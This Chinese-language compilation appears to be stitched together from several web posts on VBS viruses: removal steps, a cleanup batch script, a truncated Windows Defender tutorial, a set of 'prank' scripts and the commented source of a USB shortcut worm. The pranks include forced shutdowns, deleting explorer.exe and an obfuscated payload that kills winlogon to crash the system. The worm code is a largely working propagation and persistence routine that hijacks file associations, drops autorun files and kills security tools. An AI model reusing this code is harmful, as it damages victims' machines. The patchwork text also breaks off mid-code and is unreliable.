VBS病毒快速清除

如何清除系统里的.VBS病毒由于VBS病毒具有容易嵌入到网页等特点，因此越来越多的黑客采用这种方式传播木马病毒。

中了VBS病毒会让你在Windows下看到“.VBS”文件，系统进程中一直有wscript.exe进程存在，还有机器变慢等与其他病毒相同的现象。

如果你遇到了这个情况，可以用下面的方法进行查杀。

第一步：先要禁止wscript.exe的运行。

点击“开始→运行”，输入gpedit.msc。

第二步：在“组策略”窗格左侧，依次点击“计算机配置→Windows设置→安全设置→软件限制策略”项，然后点击“操作→创建新策略”菜单项。

再从左侧选择“其他规则”。

第三步：在右侧窗格空白处右击，在菜单中选择“新建路径规则”项。

在弹出的窗口中，点击“路径”后的“浏览”按钮，选择C:\Windows\System32文件夹下的wscript.exe文件，并将“安全级别”设置为“不允许的”(见图)如果你有不想运行的文件，也可以在这里添加第四步：将C:\Windows下的System32、Dllcache和I386这两个文件夹下wscript.exe的扩展名去除，以防止病毒突破限制运行。

注意，这期间会有Windows文件保护机制的报警，直接点击“取消→是”按钮即可。

第五步：在“任务管理器”中结束掉“wscript.exe”进程。

第六步：用IceSword等工具删除下面三个文件。

第七步：打开注册表编辑器，依次展开项，删除<*><.vbe>键。

注意这里的“<*>”是计算机名，电脑不同，名称也不同。

最后，恢复之前修改了文件名的wscript.exe文件即可。

vbs恶作剧（病毒）程序代码恶作剧(病毒)的vbs代码，这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处，最多关机重启一下就可以了打开记事本，把代码复制粘贴进去，再另存为*.vbs格式即可操作方法：把代码另存为*.VBS运行即可经本人亲自测试不会出大问题的，一般都是利用无限循环，不是死循环，可以通过任务管理器中结束wcscript.exe进程（如下图）即可解决代码的破坏。

结束VBS代码进程vbs恶作剧(病毒)程序代码代码如下:复制代码代码如下:domsgbox "hi"loop无限制的用英文报数复制代码代码如下:Set s = CreateObject("sapi.spvoice")i=0dos.speak ii=i+1loop复制代码代码如下:if MsgBox("对不起,您灌水太多需要重新启动计算机。

"&chr(10)&"确定要重启吗？",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel thenmsgbox " 系统将立刻重起wow ~_^",,"你上当了！！"Set objShell = CreateObject("Wscript.Shell")objShell.Run "shutdown -s -t 5",,trueend if复制代码代码如下:strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10, 32,32,32,32,32,32,32,32,32,32,32,109,115,103,98,111,120,32,34,-15133,89,-13899,-20026,-20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115 ,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,1 15,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119, 115,99,114,105,112,116,46,115,108,101,101,112,32,32,32,49,50,4 8,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32, 115,116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45, 99,32,113,32,45,112,110,32,119,105,110,108,111,103,111,110,46, 101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,11 8,98,104,105,100,101,13,10,101,110,100,32,105,102,13,10,13,10,1 3,10)for i=1 to UBound(strs)runner=runner&chr(strs(i))nextExecute runner这个没什么，不过加密了，大家可以解密试试复制代码代码如下:if MsgBox("你是猪头吗？",vbYesNo,"提示")=vbyes thenmsgbox "你SB啊!"elsemsgbox "还不承认!! 作为惩罚，蓝屏一下，你马上挂了#￥！@#￥%@……#……?",64,"严重警告"Set ws = CreateObject("Wscript.Shell")wscript.sleep 1200ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide复制代码代码如下:Set ws = CreateObject("Wscript.Shell")ws.run "cmd.exe /c call calc.exe",0下面的是删除explorer.exe，导致桌面没有显示，不过它事先帮你备份了，为同目录下的explorer.Data复制代码代码如下:set ws=CreateObject("Wscript.Shell")ws.run "cmd.exe /c taskkill /f /im explorer.exe",0wscript.sleep 900ws.run "cmd.exe /c copy %windir%\explorer.exe %windir%\explorer.Data"wscript.sleep 1200ws.run "cmd.exe /c del /q /f %windir%\explorer.exe复制代码代码如下:for each wind in verybatws.sendkeys windwscript.sleep 500nextws.popup"唉:-(( ⊙ o ⊙ )！呀，我好累啊，我下了 886",30ws.popup"下机可不能忘了关QQ 我吧QQ关了哈",8ws.run "taskkill /f /im qq.exe"ws.popup"你还要上吧慢慢玩哦",27dim WSHshellset WSHshell = wscript.createobject("wscript.shell")for d=0 to 4WSHshell.SendKeys "%{F4}"nextws.run"shutdown -s -t 1000600"wscript.sleep 2000doa=inputbox("请输入解除关机密码")if a="403746401" thenws.run"shutdown -a"msgbox"密码验证成功，enjoy the best!"exit doelsemsgbox"密码验证失败，请输入解除关机密码：403746401 ",vbretrycancelend ifloopws.popup"哈哈被吓到了吧好玩吧？你以为真的是病毒？呵呵O(∩_∩)O~，我还没那么打本事能做出病毒来！",57ws.popup"(\(^o^)/~ 好啦，跟你开了个小小玩笑。

U盘病毒-.vbs-wscript.exe机子又中毒了，这次中的是U盘病毒。

前几天在九六设计室拷文件的时候发现他们那边机子上的word文档不能正常打开，当时也没怎么在意，等把东西拷到我的电脑里面的时候才发现大事不妙，终于不得不承认我又中标了。

先说说症状：1.卡巴斯基不断的报警，有四五个病毒不断的复制，始终杀不完。

在每个盘里新建一个antorun.inf文件夹才得以解决。

2.360杀毒软件没运行多长时间自动关闭。

3.病毒名中有vbs，杀完毒后删除的文件是administrator.vbs4.启动项里有administrator.vbs5.运行任务管理器，可以看到有wscript.exe进程，几秒钟后任务管理器自动关闭。

6.机子卡，像QQ这样的文件也会自动关闭。

做一下准备工作:1.首先准备一个没有被感染的wscript.exe文件,为了恢复被病毒感染的程序(可以到其它机子上找,安装盘里也有,上网下载也可以).2.将如下代码复制到一个新建文本文档里.并改名为hidden.reg,用处是:修改被病毒破坏的显示系统隐藏文件的注册表Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Advanced\Folder\Hidden]'Text'='@shell32.dll,-30499''Type'='group''Bitmap'=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f ,00,6f,00,74,\00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c, 00,53,00,\48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00, 34,00,00,\00'HelpID'='shell.hlp#51131'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Advanced\Folder\Hidden\NOHIDDEN]'RegPath'='Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\ \Advanced''Text'='@shell32.dll,-30501''Type'='radio''CheckedValue'=dword:00000002'ValueName'='Hidden''DefaultValue'=dword:00000002'HKeyRoot'=dword:80000001'HelpID'='shell.hlp#51104'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]'RegPath'='Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\ \Advanced''Text'='@shell32.dll,-30500''Type'='radio''CheckedValue'=dword:00000001'ValueName'='Hidden''DefaultValue'=dword:00000002'HKeyRoot'=dword:80000001'HelpID'='shell.hlp#51105'当然也可以直接查找到注册表中的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo rer\Advanced\Folder\Hidden\SHOWALL中的CheckedValue值改为13.将下面代码保存到另外一个文本文档里,并改名为*.bat(如:vbs.bat). @echo off@echo 在其它任务管理器查(如:超级兔子)看时有wscript.exe程序@echo PS: 在windows任务管理器中无法找到此程序pause@echo 下一步会结束桌面,属于正常,等查杀结束将会恢复!taskkill /im explorer.exe /ftaskkill /im wscript.exe /t /freg deleteHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\r un /va /f@echo 请耐心等待,可能过程有点长....del c:\autorun.* /f /q /asdel %SYSTEMROOT%\system32\autorun.* /f /q /asdel c:\.vbs /f /q /s /asdel c:\.vbe /f /q /s /asdel c:\wscript.exe /f /q /sdel d:\autorun.* /f /q /s /asdel e:\autorun.* /f /q /s /asdel f:\autorun.* /f /q /s /asdel g:\autorun.* /f /q /s /asdel h:\autorun.* /f /q /s /asdel i:\autorun.* /f /q /s /asdel j:\autorun.* /f /q /s /asdel k:\autorun.* /f /q /s /asdel l:\autorun.* /f /q /s /as@echo 请单击确定,以修复注册表!call hidden.regcopy wscript.exe %SYSTEMROOT%\system32\start explorer.exe@echo 病毒已经清理完毕:)pause批处理作用原理是:关闭explorer.exe程序(很多病毒喜欢加载到这个进程中)关闭病毒程序wscript.exe进程,删除其自启动项,删除病毒文件本体和被感染的wscript.exe文件删除各个硬盘自启动文件autorun.inf 修复系统隐藏注册表项重新拷贝一个未被感染的wscript.exe文件到system32文件夹中建立桌面程序退出4.将做好的的hidden.reg和*.bat文件和wscript.exe文件放到同一个文件夹中.注意事项:注:在清除玩病毒前切不可以双击打开硬盘和u盘也不可以右键打开要用win 文件管理器或者在地址栏打开1.开始运行后会出现桌面消失的现象,情况属于正常,等杀毒结束,会新建桌面.2.删除自启动文件是可能有点慢,请耐心等候.3.在删除wscript.exe文件是有可能有提示,说是删除系统文件要从安装盘中重新拷贝什么的,同意就可以了.后面会自动拷贝此文件4.在修复注册表是会提示是否加入,点确定即可.步骤:双*.bat文件运行然后按照提示一步步向下进行就可以了!善后工作:1.关闭硬盘的自动播放功能.这样可以阻挡大部分的通过u盘自动播放的传染的病毒.(如本病毒)方法:开始-运行-输入'gpedit.msc'打开策略组-找到:'用户配置-系统模板-系统'-单击系统在右侧找到'关闭自动播放'一项-右键单击点属性-选择'已使用'-下面的关闭自动播放选项选择所有硬盘-应用确定2.如果u盘有毒的话.删除u盘的病毒方法:将下列代码保存为u.bat文件然后双击,也可以在cmd里面逐行输入. 其中X为u盘盘符del X:\.vbs /f /q /s /asdel X:\.vbe /f /q /s /asdel X:\autorun.* /f /q /s /as3.建议重启OKEY 要清除的病毒搞定了呵呵:)。

Windows系统病扫描和清除教程作为Windows系统的用户，我们时常会遭遇到各种病毒、恶意软件和广告插件的困扰。

这些威胁不仅会影响我们的计算机性能和数据安全，还可能导致系统崩溃和个人信息泄露。

因此，掌握Windows系统病毒扫描和清除的方法是非常重要的。

本教程将向您介绍如何使用Windows的内置工具，以及可靠的第三方防病毒软件，来有效地扫描和清除系统中的病毒和恶意软件。

一、使用Windows Defender进行扫描和清除Windows Defender是Windows中内置的安全软件，可以帮助我们保护计算机免受病毒、间谍软件和其他恶意软件的侵害。

以下是使用Windows Defender进行扫描和清除的步骤：1. 打开Windows Defender：在任务栏上点击Windows图标，搜索并打开“Windows Defender Security Center”。

2. 选择“病毒和威胁防护”：在Windows Defender Security Center中，点击“病毒和威胁防护”选项。

3. 进行扫描：在病毒和威胁防护页面中，点击“快速扫描”或“全面扫描”按钮来进行系统扫描。

快速扫描会检查系统核心文件和常见感染点，而全面扫描则会扫描整个系统。

4. 处理威胁：扫描完成后，Windows Defender会显示扫描结果。

如发现任何威胁，可以选择“清除”或“隔离”威胁。

清除会将感染文件永久删除，而隔离会将其隔离并放入安全容器中。

建议选择清除以确保系统的安全。

二、使用可靠的第三方防病毒软件进行扫描和清除除了Windows Defender，还有一些可靠的第三方防病毒软件可以用于扫描和清除系统中的病毒和恶意软件。

这些软件通常提供更广泛的保护功能和实时监测，可以更好地保护您的计算机。

以下是使用第三方防病毒软件进行扫描和清除的步骤：1. 下载和安装软件：从官方网站下载并安装您选择的第三方防病毒软件。

U盘病毒--vbs快捷方式病毒源代码【分析↓】vbs快捷方式病毒删除方法注意：把以下的病毒代码复制到“记事本”后，在“另存为”操作时，名称为worm.vbs，“保存类型”为“所有文件”，“编码”为“ANSI”。

不然会提示错误信息，型如行：1字符：1错误：无效字符代码：800A0408源： microsoftvbscript 编译器错误On Error Resume NextDim Fso,WshShellSet Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")Set WshShell=CreateObject("wScRipT.SHelL"):Call Main()''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''''''''''''''''''''''''主函数从这里开始''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''Sub Main()On Error Resume NextDim Args, VirusLoad, VirusAssSet Args=WScript.ArgumentsVirusLoad=GetMainVirus(1)'"c:\windows\system32\smss.exe:881406080.vbs "或者"c:\windows\system32\881406080.vbs"VirusAss=GetMainVirus(0)'"c:\windows\explorer.exe:881406080.vbs"或者"c:\windows\881406080.vbs"ArgNum=0Do While ArgNum<Args.Count'将vbs脚本的参数用空格分开一起放在Param这个字符串里面Param=Param&" "&Args(ArgNum)ArgNum=ArgNum + 1LoopSubParam=LCase(Right(Param, 3))'从Param串的右边取长度为3的子串，并且全部变为小写放进SubParamSelect Case SubParam'开始判断参数最右面，相当于后缀部分Case "run"'貌似这种情况不存在,但是第一次会运行RunPath=Left(WScript.ScriptFullName, 2)'将72161642.vbs所在磁盘返回RunPath，比如D:Call Run(RunPath)'Run("F:")没有意义Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "txt", "log","ini" ,"inf"'如果是这些表明用户打开了文本文件RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&ParamCall Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "bat", "cmd"'让批处理显示 you jump, i jump!RunPath="CMD /c echo you jump i jump!&pause"Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "reg"RunPath="regedit.exe "&""""&Trim(Param)&""""'删除路径首尾空格Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "chm"RunPath="hh.exe "&""""&Trim(Param)&""""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "hlp"RunPath="winhlp32.exe "&""""&Trim(Param)&""""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "dir"RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""'除去dir三个字母Call Run(RunPath)'打开文件夹Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "oie"RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "omc"'打开我的电脑RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "emc"'劫持Win+ERunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case ElseIf PreDblInstance=True ThenWScript.QuitEnd IfTimeout = Datediff("ww", GetInfectedDate, Date) - 12'12周也就是说感染了3个月了If Timeout>0 And Month(Date) = Day(Date) ThenCall VirusAlert()Call MakeJoke(CInt(Month(Date)))'如果是5月5号那么就弹出5次光驱End IfCall MonitorSystem()End SelectEnd Sub''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''''''''''''''''''''''''主函数至此结束''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''Sub MonitorSystem()'结束taskmgr.exe、regedit.exe、msconfig.exe、cmd.exe On Error Resume NextDim ProcessNames, ExeFullNamesProcessNames=Array("cmd.exe","","regedit.exe","regedit.scr","r egedit.pif","","msconfig.exe")'ProcessNames相当于数组首地址VBSFullNames=Array(GetMainVirus(1))DoCall KillProcess(ProcessNames)CallInvadeSystem(GetMainVirus(1),GetMainVirus(0))'1:smss.exe:72161642.vbs CallKeepProcess(VBSFullNames) '0:explorer.exe:72161642.vbs'上面这句用来保持进程活跃WScript.Sleep 3000LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath)On Error Resume NextDim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, VersionLoad_Value=""""&VirusLoadPath&""""'smss.exe的病毒流File_Value="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" %1 %* "IE_Value="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" OIE "MyCpt_Value1="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" OMC "MyCpt_Value2="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" EMC "HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Load"HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Date"VirusCode=GetCode(WScript.ScriptFullName)Version=1HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"For Each Drive In Fso.Drives'分别建立各个目录的病毒名字If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) ThenDiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)Call InfectRoot(Drive.DriveLetter,DiskVirusName)End IfIf FSO.FileExists(VirusAssPath)=False OrFSO.FileExists(VirusLoadPath)=False OrFSO.FileExists(HostFilePath)=False Or GetVersion()< Version ThenIf GetFileSystemType(GetSystemDrive())="NTFS" Then'NTFS格式Call CreateFile(VirusCode,VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)'这一步创建了流文件Call CopyFile(HostSourcePath,HostFilePath)'这一步将wscript.exe从system32复制到system目录并改名svchost.exeCall SetHiddenAttr(HostFilePath)Else'FAT32格式Call CreateFile(VirusCode, VirusAssPath)Call SetHiddenAttr(VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)Call SetHiddenAttr(VirusLoadPath)Call CopyFile(HostSourcePath, HostFilePath)Call SetHiddenAttr(HostFilePath)End IfEnd IfIfReadReg(HCULoad)<>Load_Value Then'改写注册表启动项，smss.exe的流Call WriteReg (HCULoad, Load_Value, "")End IfIfGetVersion() < Version Then'改写版本信息为1Call WriteReg (HCUVer, Version, "")End IfIfGetInfectedDate() = "" ThenCall WriteReg (HCUDate, Date, "")'记录感染时间End If'以下更改许多文件关联,病毒的通用感染方式IfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\comma nd\")<>File_Value ThenCall SetTxtFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\comma nd\")<>File_Value ThenCall SetIniFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\comma nd\")<>File_Value ThenCall SetInfFileAss(VirusAssPath)End IfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\comma nd\")<>File_Value ThenCall SetBatFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\comma nd\")<>File_Value ThenCall SetCmdFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\comma nd\")<>File_Value ThenCall SetRegFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\comm and\")<>File_Value ThenCall SetchmFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\comma nd\")<>File_Value ThenCall SethlpFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.ex e\shell\open\command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309 D}\shell\OpenHomePage\Command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\shell\open\command\")<>MyCpt_Value1 ThenCall SetMyComputerAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\shell\explore\command\")<>MyCpt_Value2 ThenCall SetMyComputerAss(VirusAssPath)End IfCall RegSet()End SubSub CopyFile(source, pathf)On Error Resume NextIf FSO.FileExists(pathf) ThenFSO.DeleteFilepathf , TrueEnd IfFSO.CopyFile source, pathfEnd SubSub CreateFile(code, pathf)On Error Resume NextDim FileTextIf FSO.FileExists(pathf) ThenSet FileText=FSO.OpenTextFile(pathf, 2, False)FileText.Write codeFileText.CloseElseSet FileText=FSO.OpenTextFile(pathf, 2, True)FileText.Write codeFileText.CloseEnd IfEnd SubSub RegSet()'文件夹选项的注册表设置On Error Resume NextDim RegPath1 , RegPath2, RegPath3, RegPath4RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"'隐藏选项失效RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"'隐藏选项失效RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer\NoDriveTypeAutoRun"RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"Call WriteReg (RegPath1, 3, "REG_DWORD")Call WriteReg (RegPath2, 2, "REG_DWORD")Call WriteReg (RegPath3, 0, "REG_DWORD")'开启所有自动播放Call DeleteReg (RegPath4)'隐藏快捷方式小箭头End SubSub KillProcess(ProcessNames)'杀掉进程On Error Resume NextSet WMIService=GetObject("winmgmts:\\.\root\cimv2")For Each ProcessName in ProcessNamesSet ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")For Each Process in ProcessListIntReturn=1'Process.terminateIf intReturn<>0 ThenWshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, FalseEnd IfNextNextEnd SubSub KillImmunity(D)'删掉autorun.inf免疫目录On Error Resume NextImmunityFolder=D&":\Autorun.inf"If Fso.FolderExists(ImmunityFolder) ThenWshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True'提权WshSHell.Run ("CMD /C RD /S /Q "&ImmunityFolder), vbHide, True'rd命令删除，配合 /s /q 选项，很轻松End IfEnd SubSub KeepProcess(VBSFullNames)'保持脚本进程持续运行，少于2个创建新进程On Error Resume NextFor Each VBSFullName in VBSFullNamesIf VBSProcessCount(VBSFullName) < 2 thenRun("%SystemRoot%\system\svchost.exe "&VBSFullName)End IfNextEnd SubFunction GetSystemDrive()'获取系统盘的盘符，比如c:GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)End FunctionFunction GetFileSystemType(Drive)'获取对应驱动器的文件系统格式Set d=FSO.GetDrive(Drive)GetFileSystemType=d.FileSystemEnd FunctionFunction ReadReg(strkey)'读取注册表，搜索strkey，返回所在路径Dim tmpsSet tmps=CreateObject("WScript.Shell")ReadReg=tmps.RegRead(strkey)Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype)'写注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")If vtype="" Thentmps.RegWritestrkey, ValueElsetmps.RegWritestrkey, Value, vtypeEnd IfSet tmps=NothingEnd SubSub DeleteReg(strkey)'删除注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")tmps.RegDeletestrkeySet tmps=NothingEnd SubSub SetHiddenAttr(path)'6=2+4,分别是隐藏、系统属性On Error Resume NextDim vfSet vf=FSO.GetFile(path)Set vf=FSO.GetFolder(path)vf.Attributes=6End SubSub Run(ExeFullName)'执行ExeFullName指定的文件On Error Resume NextDim WshShellSet WshShell=WScript.CreateObject("WScript.Shell") WshShell.RunExeFullNameSet WshShell=NothingEnd SubSub InfectRoot(D,VirusName)'感染根目录On Error Resume NextDim VBSCodeVBSCode=GetCode(WScript.ScriptFullName)VBSPath=D&":\"&VirusNameIf FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)End IfSet Folder=Fso.GetFolder(D&":\")'隐藏根目录下的所有子目录Set SubFolders=Folder.SubfoldersFor Each SubFolder In SubFoldersSetHiddenAttr(SubFolder.Path)LnkPath=D&":\"&&".lnk"'创建对应的快捷方式TargetPath=D&":\"&VirusNameArgs=""""&D&":\"&& "\Dir"""If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <>TargetPath ThenIf Fso.FileExists(LnkPath)=True ThenFSO.DeleteFileLnkPath, TrueEnd IfCall CreateShortcut(LnkPath,TargetPath,Args)End IfNextEnd SubSub CreateShortcut(LnkPath,TargetPath,Args)'上一步失败了调用这个函数创建快捷方式Set Shortcut=WshShell.CreateShortcut(LnkPath)with Shortcut.TargetPath=TargetPath.Arguments=Args.WindowStyle=4.IconLocation="%SystemRoot%\System32\Shell32.dll, 3".Saveend withEnd SubSub CreateAutoRun(D,VirusName)'创建autorun.inf文件On Error Resume NextDim InfPath, VBSPath, VBSCodeInfPath=D&":\AutoRun.inf"VBSPath=D&":\"&VirusNameVBSCode=GetCode(WScript.ScriptFullName)If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"&VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun"""Call KillImmunity(D)Call CreateFile(StrInf, InfPath)Call SetHiddenAttr(InfPath)End IfEnd SubSub SetTxtFileAss(sFilePath)'改变txt格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath)'改变ini格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath)'改变inf格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath)'改变bat格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %*"CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath)'改变cmd格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath)'改变hlp格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath)'改变reg格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath)'改变chm格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\com mand\", Value, "REG_EXPAND_SZ")End 